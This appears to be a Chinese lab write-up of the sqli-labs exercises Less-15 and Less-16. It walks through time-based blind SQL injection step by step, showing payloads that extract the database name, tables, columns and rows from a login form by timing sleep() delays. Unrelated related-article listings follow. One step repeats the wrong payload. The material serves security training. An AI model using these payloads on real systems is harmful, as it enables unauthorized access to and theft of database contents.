Less-15(布尔/时间盲注)

1.判断是否存在注入点

无论是输入admin/admin’/admin” 都显示回显正常,于是执行uname=admin' and sleep(5)#&passwd=&submit=Submit,发现延时回显,首先判断存在注入点,注入方式为:’’

2.爆库

爆库长:uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit

判断的数据库字符长度为8

爆库名:uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

判断数据库名字的第一个字符

3.爆表

爆第一个表长:uname=admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),1)#&passwd=&submit=Submit

爆第一个表名:admin' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#

4.爆字段

爆第一个字段的长度:admin' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#

爆第一个字段名:admin' and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#

5.爆数据

爆第一个数据的长度:admin' and if(length((select id from emails limit 0,1))=1,sleep(3),1)#

爆第一个数据:admin' and if(substr((select id from emails limit 0,1),1,1)=1,sleep(3),1)#

-------------------------------------------------------END----------------------------------------------------------------

Less-16 (布尔/时间盲注)

1.判断是否存在注入点

执行uname=admin" and sleep(3)#&passwd=&submit=Submit或者uname=admin’ and sleep(3)#&passwd=&submit=Submit后均无反应,于是尝试执行uname=admin") and sleep(3)#&passwd=&submit=Submit,页面发生延迟,判断存在注入点

2.爆库

爆库长:uname=admin") and if (length(database())=8,sleep(3),1)#&passwd=&submit=Submit

判断数据库的长度是8

爆库名:uname=admin") and if (substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

判断数据库名字的第一个字母是什么

以此类推,得到数据库名为’security’

3.爆表

爆第一个表长:uname=admin") and if (length((select table_name from information_schema.tables where table_schema='security' limit 0,1)),sleep(3),1)#&passwd=&submit=Submit

爆第一个表名:uname=admin") and if (substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#&passwd=&submit=Submit

4.爆字段

爆第一个字段长:uname=admin") and if (length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#&passwd=&submit=Submit

爆第一个字段名:uname=admin") and if (substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#&passwd=&submit=Submit

5.爆数据

爆第一个数据长:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

爆第一个数据:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

-------------------------------------------------------END----------------------------------------------------------------

sqli-labs less-15 --> less-16的更多相关文章

  1. Gold Coins 分类: POJ 2015-06-10 15:04 16人阅读 评论(0) 收藏

    Gold Coins Time Limit: 1000MS   Memory Limit: 30000K Total Submissions: 21767   Accepted: 13641 Desc ...

  2. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  3. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  4. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  5. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  6. OpenGL第15,16,17讲小结

    这三讲没有什么特别的感觉,15讲把纹理贴到3D字体上,16讲讲了雾的生成,17讲是通过以事先保存好的纹理贴图的字体来显示2D文字,这样子不用调用windows的字体,而是使用纹理中的字体.这样也在一定 ...

  7. 阅读<构建之法>13、14、15、16、17章

    13章 这么多测试为什么不能整理出一个包括所有功能的测试呢?看着那么多测试都感觉奇怪了. 14章 怎样才能体现一个测试人员的工作价值呢?这样的判断又是否会太独断了? 15章 在时间上,会不会因不同功能 ...

  8. 阅读<构建之法>第13、14、15、16、17章 与 《一个程序员的生命周期》读后感

    第十三章   软件测试 这一章介绍了很多关于测试的方法,比如说单元测试,代码覆盖率测试,构建验证测试,验收测试等,我有一个很纠结的问题,如果我开发软件,是把这么多测试全做完,还是挑一些测试来进行呢?如 ...

  9. RH033读书笔记(15)-Lab 16 The Linux Filesystem

    Lab 16 The Linux Filesystem Goal: Develop a better understanding of Linux filesystem essentials incl ...

  10. LeetCode 15. 3Sum 16. 3Sum Closest 18. 4Sum

    n数求和,固定n-2个数,最后两个数在连续区间内一左一右根据当前求和与目标值比较移动,如果sum<target,移动较小数,否则,移动较大数 重复数处理: 使i为左至右第一个不重复数:while ...

随机推荐

  1. 后台+下载(wget)+多个下载url

    有时候我们需要让linux下载多个文件,并且后台下载,不去占用当前控制台. 比如我们需要下载中文维基的三个文件: https://dumps.wikimedia.org/zhwiki/latest/z ...

  2. MongoDB 复本集搭建

    复制集的特点   数据一致性 主是唯一的,但不是固定的  没有MySQL那样的双主结构 大多数原则,集群存活节点小于等于二分之一时集群不可写,只可读. 是否能选举出新的主节点,是由当前复制集成员存活量 ...

  3. 非对称加密 秘钥登录 https

    非对称加密简介: 对称加密算法在加密和解密时使用的是同一个秘钥:而非对称加密算法需要两个密钥来进行加密和解密,这两个秘钥是公开密钥(public key,简称公钥)私有密钥(private key,简 ...

  4. CVE-2020-0618 SQL Server远程代码执行

    1.简介 SQL Server Reporting Services(SSRS)提供了一组本地工具和服务,用于创建,部署和管理移动报告和分页报告. SSRS Web应用程序中的功能允许低特权用户帐户通 ...

  5. 为什么你精通CRUD,却搞不懂数据库的基本原理?

    原创声明 本文作者:黄小斜 转载请务必在文章开头注明出处和作者. 本文思维导图

  6. 【转】netty-transport版本冲突

    Springboot整合Elasticsearch报错 今天使用SpringBoot整合Elasticsearch时候,相关的配置完成后,启动项目就报错了. nested exception is j ...

  7. 转载:字符编码简介 ASCII UTF-8 ISO8859-1

    字符编码简介 ASCII UTF-8 ISO8859-1 博客分类: 电脑综合知识 XP数据结构Windows  计算机中的一切都是以数字来表示的,字符同样如此.字符编码就是将字符集编码成为数字序列, ...

  8. mysql官方源安装的一些问题

    今天测试Linux 各个软件源 ,发现mysql 配置官方源之后,yum install -y mysql   安装了 mysql lastst 最新版,  安装完之后,奇葩的是没有提示输入密码, 所 ...

  9. IDEA下配置JavaWeb项目

    前提 已安装IDEA专业版 已安装Tomcat 已安装JDK 创建JavaWeb项目 File --> New --> Project... 设置工程名字: 创建完成后工程结构如下: 设置 ...

  10. MongoDB批量操作时字段为null时没有入库

    今天在Java后端批量插入数据至MongoDB后,在MongoDB数据库中发现某个字段没有成功入库,一查看代码,在List的元素对象中是有这个字段的,不知为啥就没有入库了. (1)调试 遇到此情况,赶 ...